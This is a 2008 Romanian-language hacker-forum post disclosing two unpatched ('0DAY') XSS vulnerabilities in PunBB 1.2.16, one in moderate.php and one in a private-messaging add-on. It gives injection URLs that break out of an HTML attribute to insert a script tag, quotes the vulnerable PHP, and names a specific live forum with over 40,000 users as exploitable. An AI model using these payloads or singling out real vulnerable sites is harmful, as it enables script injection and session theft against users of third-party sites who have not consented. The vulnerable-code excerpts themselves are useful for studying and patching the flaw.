[RST] PunBB <= 1.2.16 XSS (0DAY)

tw8 · January 8, 2008

Salut!

Am gasit 2 vulnerabilitati de tip XSS in PunBB si m-am gandit sa le impart cu voi . Pentru cei care nu stiu ce e PunBB, aruncati o privire pe site-ul oficial.

Vulnerabilitatea #1 (necesita drepturi de admin/moderator)

Download script : http://punbb.org/download/punbb-1.2.16.zip


[url]http://[localhost]/[/url][path]/moderate.php?get_host=0.0.0.0">[script]

Cod vulnerabil



if (isset($_GET['get_host']))
{
	if ($pun_user['g_id'] > PUN_MOD)
		message($lang_common['No permission']);

	// Is get_host an IP address or a post ID?
	if (@preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', $_GET['get_host']))
		$ip = $_GET['get_host'];
	else
	{
		$get_host = intval($_GET['get_host']);
		if ($get_host < 1)
			message($lang_common['Bad request']);

		$result = $db->query('SELECT poster_ip FROM '.$db->prefix.'posts WHERE id='.$get_host) or error('Unable to fetch post IP address', __FILE__, __LINE__, $db->error());
		if (!$db->num_rows($result))
			message($lang_common['Bad request']);

		$ip = $db->result($result);
	}

	message('The IP address is: '.$ip.'
The host name is: '.@gethostbyaddr($ip).'

[url="admin_users.php?show_users='.$ip.'"]Show more users for this IP[/url]');
}

Vulnerabilitatea #2 (nesesita Private Messaging System instalat)

Download script: http://www.punres.org/download.php?id=1579


[url]http://[localhost]/[/url][path]/message_send.php?id=2&tid=">[script]

Cod vulnerabil



<input type="hidden" name="topic_redirect" value="<?php echo isset($_GET['tid']) ? $_GET['tid'] : '' ?>" />

Exemplu de forum vulnerabil cu > 40.000 useri:


[url]http://www.deblok83.com/forum.php[/url]

P.S.: Nu am cerut acordul nimanui sa pun RST in titlu, pentru ca kwe e "Stepped Out", iar PM-ul se citeste cam rar. Asa ca, daca nu sunteti de acord, puteti sterge RST din titlu, dar eu nu cred ca e ceva rau .

Bafta !

Sign In

[RST] PunBB <= 1.2.16 XSS (0DAY)

Recommended Posts

tw8

Join the conversation

Browse

Activity

Pages